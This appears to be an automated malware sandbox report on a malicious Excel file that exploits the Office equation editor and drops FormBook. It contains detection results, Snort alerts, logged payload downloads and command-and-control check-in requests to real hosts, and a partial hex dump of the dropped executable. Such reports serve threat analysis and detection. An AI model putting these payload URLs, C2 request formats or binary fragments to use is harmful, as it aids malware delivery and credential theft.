"0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------

Multi AV Scanner detection for submitted file

Show sources

Source: NEW 01 13 2021.xlsx	Virustotal: Detection: 29%			Perma Link
Source: NEW 01 13 2021.xlsx	ReversingLabs: Detection: 22%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe	Joe Sandbox ML: detected

Source: 6.2.vbc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: chkdsk.pdb source: vbc.exe, 00000006.00000002.2220300365.000000000047D000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe

Source: global traffic

DNS query: name: www.yjpps.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.195.87.136:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.195.87.136:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 18.195.87.136:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 16:17:28 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Jan 2021 09:32:43 GMTETag: "ce400-5b8c4d239f0b9"Accept-Ranges: bytesContent-Length: 844800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 63 bd fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 da 0c 00 00 08 00 00 00 00 00 00 ce f8 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 f8 0c 00 4b 00 00 00 00 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 d8 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0d 00 00 06 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f8 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 3e 0b 00 88 b9 01 00 03 00 00 00 43 01 00 06 68 36 02 00 90 08 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 2b 02 26 16 02 28 01 00 00 0a 2a 36 2b 02 26 16 00 02 28 04 00 00 0a 00 2a 00 00 13 30 03 00 12 01 00 00 01 00 00 11 fe 09 00 00 fe 0e 00 00 fe 0c 00 00 20 2b f3 88 0a 20 96 b2 41 ee 58 20 2a a0 25 08 59 20 87 05 a5 f0 61 20 02 00 00 00 63 3b 68 00 00 00 fe 0c 00 00 20 e1 68 eb e3 20 e9 68 eb e3 61 59 45 04 00 00 00 5f 00 00 00 2a 00 00 00 a1 00 00 00 52 00 00 00 fe 0c 00 00 20 fe 73 c8 26 65 20 66 8c 37 d9 59 20 02 00 00 00 63 66 59 45 02 00 00 00 64 00 00 00 4c 00 00 00 38 77 00 00 00 20 44 78 c5 1e 65 20 23 a7 e4 e1 61 20 5d df 21 ff 58 20 01 00 00 00 63 2a 20 2b 0e 54 1b 65 66 65 20 db f1 ab e4 59 2a 20 0b 00 00 00 66 20 01 00 00 00 63 2a 20 c7 ef eb 2e 20 ce c8 4e 09 59 20 06 d9 62 da 58 2a 20 03 49 7e 12 20 2a 68 99 eb 61 20 e1 4d dc dc 58 20 f2 90 3c 29 61 2a 20 18 75 52 ea 20 65 ff c1 fc 59 20 3e 39 9f 0f 61 20 9c 4c 0f e2 59 2a 20 19 b6 66 1f 20 98 fb 6f 12 59 20

Source: global traffic	HTTP traffic detected: GET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1Host: www.thepoetrictedstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.tuvandadayvitos24h.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.acdfr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 35.246.6.109 35.246.6.109
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic

HTTP traffic detected: GET /ttkkz/file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown	TCP traffic detected without corresponding DNS query: 18.195.87.136

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31FF70E4.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /ttkkz/file2.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1Host: www.thepoetrictedstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.tuvandadayvitos24h.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.acdfr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.yjpps.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 16:19:08 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.acdfr.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Wed, 27-Jan-2021 16:19:08 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages20.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 31 30 34 37 39 38 34 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f

Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
